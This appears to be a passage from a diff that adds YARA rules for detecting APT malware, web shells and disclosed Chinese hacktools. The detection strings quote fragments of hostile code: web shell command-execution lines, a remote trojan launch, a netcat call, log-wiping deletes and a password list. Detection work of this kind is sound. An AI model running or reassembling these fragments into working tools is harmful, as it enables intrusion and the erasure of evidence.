+      $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+      $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+      $s4 = "<platform type=\"1\">" fullword ascii
+      $s5 = "</plugin>" fullword ascii
+      $s6 = "</pluginConfig>" fullword ascii
+      $s7 = "<pluginConfig>" fullword ascii
+      $s8 = "</platform>" fullword ascii
+      $s9 = "</lpConfig>" fullword ascii
+      $s10 = "<lpConfig>" fullword ascii
+   condition: 
+      all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef_RID34DC : APT DEMO MAL {
+   meta:
+      description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+      author = "Florian Roth"
+      reference = "http://www.spiegel.de/media/media-35668.pdf"
+      date = "2015-01-18 15:48:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
+      $s1 = "<message>Failed to get File Time</message>" fullword ascii
+      $s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
+      $s3 = "<message>Failed to set File Time</message>" fullword ascii
+      $s4 = "</commands>" fullword ascii
+      $s5 = "<commands>" fullword ascii
+      $s6 = "</version>" fullword ascii
+      $s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
+      $s8 = "<message>No Comms. with Driver</message>" fullword ascii
+      $s9 = "</error>" fullword ascii
+      $s10 = "<message>Invalid File Size</message>" fullword ascii
+      $s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
+      $s12 = "<message>File Size Mismatch</message>" fullword ascii
+      $s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
+      $s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
+      $s15 = "<dllDepend>None</dllDepend>" fullword ascii
+      $s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
+      $s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
+      $s18 = "<minorType>0</minorType>" fullword ascii
+      $s19 = "<code>00001002</code>" fullword ascii
+      $s20 = "<code>00001001</code>" fullword ascii
+   condition: 
+      12 of them
+}
+
+rule Pastebin_Webshell_RID2DDC : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+      author = "Florian Roth"
+      reference = "http://goo.gl/7dbyZs"
+      date = "2015-01-13 10:49:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "file_get_contents(\"http://pastebin.com" ascii
+      $s1 = "xcurl('http://pastebin.com/download.php" ascii
+      $s2 = "xcurl('http://pastebin.com/raw.php" ascii
+      $x0 = "if($content){unlink('evex.php');" ascii
+      $x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
+      $y0 = "file_put_contents($pth" ascii
+      $y1 = "echo \"<login_ok>" ascii
+      $y2 = "str_replace('* @package Wordpress',$temp" ascii
+   condition: 
+      1 of ( $s* ) or all of ( $x* ) or all of ( $y* )
+}
+
+rule CoreImpact_sysdll_exe_RID2F93 : APT DEMO G0130 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects a malware sysdll.exe from the Rocket Kitten APT"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-12-27 12:03:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "APT, DEMO, G0130, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "d:\\nightly\\sandbox_avg10_vc9_SP1_2011\\source\\avg10\\avg9_all_vs90\\bin\\Rele" ascii
+      $s1 = "Mozilla/5.0" fullword ascii
+      $s3 = "index.php?c=%s&r=%lx" fullword ascii
+      $s4 = "index.php?c=%s&r=%x" fullword ascii
+      $s5 = "127.0.0.1" fullword ascii
+      $s6 = "/info.dat" ascii
+      $s7 = "needroot" fullword ascii
+      $s8 = "./plugins/" ascii
+   condition: 
+      $s0 or 6 of them
+}
+
+rule SoakSoak_Infected_Wordpress_RID31D6 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+      author = "Florian Roth"
+      reference = "http://goo.gl/1GzWUX"
+      date = "2014-12-15 13:39:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
+      $s1 = "function FuncQueueObject()" ascii fullword
+      $s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
+   condition: 
+      all of ( $s* )
+}
+
+rule HawkEye_PHP_Panel_RID2D55 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects HawkEye Keyloggers PHP Panel"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-12-14 10:27:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$fname = $_GET['fname'];" ascii fullword
+      $s1 = "$data = $_GET['data'];" ascii fullword
+      $s2 = "unlink($fname);" ascii fullword
+      $s3 = "echo \"Success\";" fullword ascii
+   condition: 
+      all of ( $s* ) and filesize < 600
+}
+
+rule CN_Hacktool_MilkT_BAT_RID2EAC : CHINA DEMO HKTL SCRIPT SUSP {
+   meta:
+      description = "Detects a chinese Portscanner named MilkT - shipped BAT"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-12-10 11:24:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
+      $s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
+   condition: 
+      all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell_RID31E3 : APT DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+      author = "Florian Roth"
+      reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
+      date = "2014-12-10 13:41:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
+      $a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
+   condition: 
+      all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell_2_RID3274 : APT DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+      author = "Florian Roth"
+      reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
+      date = "2014-12-10 14:05:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
+      $a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
+      $s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
+      $s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
+   condition: 
+      all of ( $a* ) or all of ( $s* )
+}
+
+rule Webshell_Insomnia_RID2DE4 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Insomnia Webshell - file InsomniaShell.aspx"
+      author = "Florian Roth"
+      reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
+      date = "2014-12-09 10:51:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
+      $s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
+      $s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
+      $s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
+      $s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
+      $s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
+      $s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
+      $s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
+   condition: 
+      3 of them
+}
+
+rule OPCLEAVER_Parviz_Developer_RID3092 : APT DEMO G0003 {
+   meta:
+      description = "Parviz developer known from Operation Cleaver"
+      author = "Florian Roth"
+      reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+      date = "2014-12-02 12:45:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Users\\parviz\\documents\\" nocase
+   condition: 
+      $s1
+}
+
+rule OPCLEAVER_CCProxy_Config_RID2F6E : APT DEMO G0003 {
+   meta:
+      description = "CCProxy config known from Operation Cleaver"
+      author = "Florian Roth"
+      reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+      date = "2014-12-02 11:56:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "UserName=User-001" fullword ascii
+      $s2 = "Web=1" fullword ascii
+      $s3 = "Mail=1" fullword ascii
+      $s4 = "FTP=0" fullword ascii
+      $x1 = "IPAddressLow=78.109.194.114" fullword ascii
+   condition: 
+      all of ( $s* ) or $x1
+}
+
+rule XYZCmd_zip_Folder_Readme_RID304A : DEMO HKTL SUSP {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file Readme.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 12:33:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
+      $s20 = "XYZCmd V1.0" fullword ascii
+   condition: 
+      all of them
+}
+
+rule PassSniffer_zip_Folder_readme_RID32AF : DEMO HKTL SUSP {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file readme.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 14:15:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "PassSniffer.exe" fullword ascii
+      $s1 = "POP3/FTP Sniffer" fullword ascii
+      $s2 = "Password Sniffer V1.0" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule HKTL_BypassUacDll_6_RID2DDF : DEMO HKTL SUSP {
+   meta:
+      description = "Semiautomatically generated YARA rule - file BypassUacDll.aps"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 10:50:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "BypassUacDLL.dll" fullword wide
+      $s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+   condition: 
+      all of them
+}
+
+rule HKTL_BypassUac_EXE_RID2D6F : DEMO HKTL SUSP {
+   meta:
+      description = "Semiautomatically generated YARA rule - file BypassUacDll.aps"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 10:31:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Wole32.dll" wide
+      $s3 = "System32\\migwiz" wide
+      $s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
+      $s5 = "Elevation:Administrator!new:" wide
+      $s6 = "BypassUac" wide
+   condition: 
+      all of them
+}
+
+rule aspbackdoor_EDIT_RID2D1F : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 10:18:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
+      $s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
+      $s3 = "response.write \"<a href='index.asp'>" fullword ascii
+      $s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
+      $s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
+      $s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
+      $s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
+   condition: 
+      5 of them
+}
+
+rule aspbackdoor_entice_RID2E71 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file entice.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 11:14:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
+      $s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
+      $s4 = "conndb.Execute(sqllanguage)" fullword ascii
+      $s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
+      $s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_sig_238_cmd_2_RID2F09 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 11:40:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Process child = Runtime.getRuntime().exec(" ascii
+      $s1 = "InputStream in = child.getInputStream();" fullword ascii
+      $s2 = "String cmd = request.getParameter(\"" ascii
+      $s3 = "while ((c = in.read()) != -1) {" fullword ascii
+      $s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_aspfile2_RID2DBC : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 10:44:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "response.write \"command completed success!\" " fullword ascii
+      $s1 = "for each co in foditems " fullword ascii
+      $s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
+      $s19 = "<title>Hello! Welcome </title>" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_aspbackdoor_EDIR_RID30B2 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 12:50:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "response.write \"<a href='index.asp'>" fullword ascii
+      $s3 = "if Request.Cookies(\"password\")=\"" ascii
+      $s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
+      $s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+      $s19 = "whichdir=Request(\"path\")" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_aspbackdoor_asp4_RID3106 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file asp4.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 13:04:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "system.dll" fullword ascii
+      $s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
+      $s3 = "Public Function reboot(atype As Variant)" fullword ascii
+      $s4 = "t& = ExitWindowsEx(1, atype)" ascii
+      $s5 = "atype=request(\"atype\") " fullword ascii
+      $s7 = "AceiveX dll" fullword ascii
+      $s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
+      $s10 = "sys.reboot(atype)" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_aspfile1_RID2DBB : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 10:44:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "' -- check for a command that we have posted -- '" fullword ascii
+      $s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
+      $s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
+      $s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
+      $s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
+      $s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
+   condition: 
+      3 of them
+}
+
+rule Webshell_aspbackdoor_regdll_RID3208 : DEMO HKTL T1100 T1117 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file regdll.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 13:47:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, T1117, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
+      $s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
+      $s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
+      $s5 = "Public Property Get oFS()" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_aspbackdoor_asp3_RID3105 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file asp3.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 13:04:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
+      $s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
+      $s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
+      $s14 = " Windows NT " fullword ascii
+      $s16 = " WIndows 2000 " fullword ascii
+      $s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
+      $s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
+      $s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_aspbackdoor_asp1_RID3103 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file asp1.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 13:04:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
+      $s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
+      $s6 = "set rs=conn.execute (sql)%> " fullword ascii
+      $s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
+      $s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
+      $s15 = "sql=\"select * from scjh\" " fullword ascii
+   condition: 
+      all of them
+}
+
+rule Jc_WinEggDrop_Shell_RID2E4A : DEMO HKTL SCRIPT SUSP {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 11:08:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Sniffer.dll" fullword ascii
+      $s4 = ":Execute net.exe user Administrator pass" fullword ascii
+      $s5 = "Fport.exe or mport.exe " fullword ascii
+      $s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
+      $s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
+      $s15 = ": Del www.exe                   " fullword ascii
+      $s20 = ":Dir *.exe                    " fullword ascii
+   condition: 
+      2 of them
+}
+
+rule EditKeyLogReadMe_RID2D10 : DEMO HKTL SUSP {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe_RID2D10.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 10:15:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
+      $s1 = "WinEggDrop.DLL" fullword ascii
+      $s2 = "nc.exe" fullword ascii
+      $s3 = "KeyLog.exe" fullword ascii
+      $s4 = "EditKeyLog.exe" fullword ascii
+      $s5 = "wineggdrop" fullword ascii
+   condition: 
+      3 of them
+}
+
+rule aspbackdoor_ipclear_RID2ED9 : DEMO HKTL SCRIPT SUSP {
+   meta:
+      description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-23 11:32:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
+      $s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
+      $s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
+      $s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
+      $s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Hacktools_CN_Burst_Blast_RID306D : CHINA DEMO HKTL SCRIPT SUSP {
+   meta:
+      description = "Disclosed hacktool set - file Blast.bat"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-17 12:39:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
+      $s1 = "@echo off" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Hacktools_CN_445_cmd_RID2E38 : CHINA DEMO FILE HKTL SCRIPT SUSP {
+   meta:
+      description = "Disclosed hacktool set - file cmd.bat"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-17 11:05:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, HKTL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $bat = "@echo off" fullword ascii
+      $s0 = "cs.exe %1" fullword ascii
+      $s2 = "nc %1 4444" fullword ascii
+   condition: 
+      uint32 ( 0 ) == 0x68636540 and $bat at 0 and all of ( $s* )
+}
+
+rule Hacktools_CN_Burst_pass_RID302E : CHINA DEMO HKTL SUSP {
+   meta:
+      description = "Disclosed hacktool set - file pass.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-17 12:28:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "123456.com" fullword ascii
+      $s1 = "123123.com" fullword ascii
+      $s2 = "360.com" fullword ascii
+      $s3 = "123.com" fullword ascii
+      $s4 = "juso.com" fullword ascii
+      $s5 = "sina.com" fullword ascii
+      $s7 = "changeme" fullword ascii
+      $s8 = "master" fullword ascii
+      $s9 = "google.com" fullword ascii
+      $s10 = "chinanet" fullword ascii
+      $s12 = "lionking" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Hacktools_CN_Burst_Clear_RID305E : CHINA DEMO HKTL SCRIPT SUSP {
+   meta:
+      description = "Disclosed hacktool set - file Clear.bat"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-17 12:36:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
+      $s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
+      $s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
+      $s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
+      $s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
+      $s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
+      $s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
+      $s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
+      $s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
+   condition: 
+      5 of them
+}
+
+rule Hacktools_CN_Burst_Start_RID3085 : CHINA DEMO HKTL SCRIPT SUSP {
+   meta:
+      description = "Disclosed hacktool set - file Start.bat - DoS tool"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-11-17 12:43:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
